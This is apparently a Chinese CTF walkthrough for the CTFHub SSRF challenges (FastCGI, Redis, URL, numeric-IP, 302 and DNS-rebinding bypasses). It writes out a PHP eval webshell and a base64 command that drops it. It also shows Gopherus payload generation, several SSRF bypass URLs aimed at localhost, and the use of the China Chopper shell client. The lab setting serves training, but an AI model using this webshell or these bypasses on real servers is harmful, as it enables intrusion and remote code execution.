本文主要是介绍ctfhub-web-SSRF(FastCGI协议-DNS重绑定 Bypass),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
less-6 FastCGI协议
步骤一:开启环境,查看提示
步骤二:对一句话木马进行base64编码:<?php @eval($_POST[cmd]);?>
echo "PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+" | base64 -d > 1.php
步骤三:利用kali,使用Gopherus工具生成payload:
python2 '/home/kali/Desktop/Gopherus/gopherus.py' --exploit fastcgi
/var/www/html/index.php
echo "PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+" | base64 -d > 1.php
步骤四:对所生成进行url编码
步骤五:添加到?url=
访问木马程序
步骤六:利用中国菜刀进行连接
找寻flag
显示提交成功
less-7 Redis协议
步骤一:开启环境,查看提示
步骤三:利用kali,使用Gopherus工具生成payload:
利用url进行编码
添加?url=
访问shell.php
利用中国菜刀进行连接
找到flag
显示提交成功
less-8 URL Bypass
步骤一:开启环境,查看提示
访问url=http://127.0.0.1/flag.php
url=http://notfound.ctfhub.com@127.0.0.1/flag.php
显示提交成功
less-9 数字IP Bypass
步骤一:开启环境,查看提示
访问url=http://127.0.0.1/flag.php
进行进制转换,.换成0
输入:url=http://0x7f000001/flag.php
显示提交成功
less-10 302跳转 Bypass
步骤一:开启环境,查看提示
访问url=http://127.0.0.1/flag.php
url=localhost/flag.php
显示提交成功
less-11 DNS重绑定 Bypass
步骤一:开启环境,查看提示
打开题目附件
rbndr.us dns rebinding service (cmpxchg8b.com)
url=http://7f000001.7f000002.rbndr.us/flag.php
显示提交成功
这篇关于ctfhub-web-SSRF(FastCGI协议-DNS重绑定 Bypass)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!